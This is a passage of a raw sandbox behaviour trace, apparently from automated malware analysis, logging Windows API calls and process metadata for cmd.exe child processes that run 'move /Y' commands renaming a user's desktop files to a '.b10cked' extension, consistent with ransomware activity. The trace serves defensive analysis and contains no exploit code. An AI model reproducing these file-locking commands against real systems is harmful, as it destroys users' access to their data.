lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.576] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.576] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.576] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.576] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.576] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.576] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.576] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.576] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.576] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.576] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.576] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.577] GetEnvironmentStringsW () returned 0x2c22c8* [0225.577] FreeEnvironmentStringsW (penv=0x2c22c8) returned 1 [0225.577] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.577] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.577] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.577] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.577] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.577] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.577] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.577] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.577] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.577] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af940 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.577] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af940, lpFilePart=0x1af93c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af93c*="Desktop") returned 0x18 [0225.577] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.577] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af6bc | out: lpFindFileData=0x1af6bc) returned 0x2c0008 [0225.578] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0225.578] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af6bc | out: lpFindFileData=0x1af6bc) returned 0x2c0008 [0225.578] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0225.578] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af6bc | out: lpFindFileData=0x1af6bc) returned 0x2c0008 [0225.578] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0225.578] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.578] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.578] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.578] GetEnvironmentStringsW () returned 0x2c2ae8* [0225.579] FreeEnvironmentStringsW (penv=0x2c2ae8) returned 1 [0225.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.579] GetConsoleOutputCP () returned 0x1b5 [0225.579] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.579] GetUserDefaultLCID () returned 0x409 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afa80, cchData=128 | out: lpLCData="0") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afa80, cchData=128 | out: lpLCData="0") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afa80, cchData=128 | out: lpLCData="1") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.580] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.581] GetConsoleTitleW (in: lpConsoleTitle=0x2b08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.582] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.582] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.582] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.582] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.583] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.583] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.583] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.583] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.583] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.583] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.583] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.586] GetConsoleTitleW (in: lpConsoleTitle=0x1af778, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.680] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.680] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.680] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.680] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.680] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.680] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.680] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.680] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.680] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.680] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.680] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.680] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.680] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.680] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.680] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.680] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.680] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.680] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.682] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af534, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af52c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.684] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.684] _wcsicmp (_String1="KAWGR8~1.SWF", _String2=".") returned 61 [0225.684] _wcsicmp (_String1="KAWGR8~1.SWF", _String2="..") returned 61 [0225.684] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8~1.swf")) returned 0x20 [0225.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2c1d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.685] SetErrorMode (uMode=0x0) returned 0x0 [0225.685] SetErrorMode (uMode=0x1) returned 0x0 [0225.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", nBufferLength=0x104, lpBuffer=0x1aeebc, lpFilePart=0x1aeea4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", lpFilePart=0x1aeea4*="KAWGR8~1.SWF") returned 0x25 [0225.685] SetErrorMode (uMode=0x0) returned 0x1 [0225.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.685] _wcsicmp (_String1="KAWGR8~1.SWF", _String2=".") returned 61 [0225.685] _wcsicmp (_String1="KAWGR8~1.SWF", _String2="..") returned 61 [0225.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8~1.swf")) returned 0x20 [0225.685] SetErrorMode (uMode=0x0) returned 0x0 [0225.685] SetErrorMode (uMode=0x1) returned 0x0 [0225.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", nBufferLength=0x104, lpBuffer=0x1af338, lpFilePart=0x1af0d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", lpFilePart=0x1af0d0*="KAWGR8~1.SWF") returned 0x25 [0225.685] SetErrorMode (uMode=0x0) returned 0x1 [0225.686] SetErrorMode (uMode=0x0) returned 0x0 [0225.686] SetErrorMode (uMode=0x1) returned 0x0 [0225.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", nBufferLength=0x104, lpBuffer=0x1af540, lpFilePart=0x1af0d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", lpFilePart=0x1af0d0*="kawGr8UmxCuLrfZA.swf.b10cked") returned 0x35 [0225.686] SetErrorMode (uMode=0x0) returned 0x1 [0225.686] SetLastError (dwErrCode=0x0) [0225.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf.b10cked")) returned 0xffffffff [0225.686] GetLastError () returned 0x2 [0225.686] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", fInfoLevelId=0x1, lpFindFileData=0x1aea4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aea4c) returned 0x2b0f20 [0225.686] FindNextFileW (in: hFindFile=0x2b0f20, lpFindFileData=0x1aea4c | out: lpFindFileData=0x1aea4c) returned 0 [0225.687] GetLastError () returned 0x12 [0225.687] FindClose (in: hFindFile=0x2b0f20 | out: hFindFile=0x2b0f20) returned 1 [0225.688] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", fInfoLevelId=0x1, lpFindFileData=0x2c1af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1af0) returned 0x2b0f20 [0225.688] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", nBufferLength=0x104, lpBuffer=0x1aece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", lpFilePart=0x0) returned 0x35 [0225.688] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf", nBufferLength=0x104, lpBuffer=0x1aece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf", lpFilePart=0x0) returned 0x2d [0225.688] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf")) returned 0x20 [0225.688] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf.b10cked"), dwFlags=0x3) returned 1 [0225.689] FindClose (in: hFindFile=0x2b0f20 | out: hFindFile=0x2b0f20) returned 1 [0225.689] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aec98 | out: _Buffer=" 1") returned 9 [0225.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.689] GetFileType (hFile=0x7) returned 0x2 [0225.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.690] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aec24 | out: lpMode=0x1aec24) returned 1 [0225.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aec58 | out: lpConsoleScreenBufferInfo=0x1aec58) returned 1 [0225.690] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.691] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x1aec98 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.691] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aec7c, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x1aec7c*=0x1a) returned 1 [0225.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.691] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.691] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.691] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.691] SetConsoleInputExeNameW () returned 0x1 [0225.691] GetConsoleOutputCP () returned 0x1b5 [0225.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.692] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.692] exit (_Code=0) Process: id = "592" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33609 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33610 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33611 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33612 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33613 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33614 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33615 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33616 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33617 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33618 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33862 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33863 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33864 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33865 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 33866 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33867 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33868 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33869 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33870 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33871 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33872 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33873 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33874 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33875 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33876 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 33877 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33878 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33879 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33880 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33881 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33882 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 33883 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 33884 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 33885 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 815 os_tid = 0x6fc [0225.486] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efae4 | out: lpSystemTimeAsFileTime=0x2efae4*(dwLowDateTime=0xb9f68aa0, dwHighDateTime=0x1d440a9)) [0225.486] GetCurrentProcessId () returned 0xeac [0225.486] GetCurrentThreadId () returned 0x6fc [0225.486] GetTickCount () returned 0x3e3f8 [0225.486] QueryPerformanceCounter (in: lpPerformanceCount=0x2efadc | out: lpPerformanceCount=0x2efadc*=28227553528) returned 1 [0225.487] 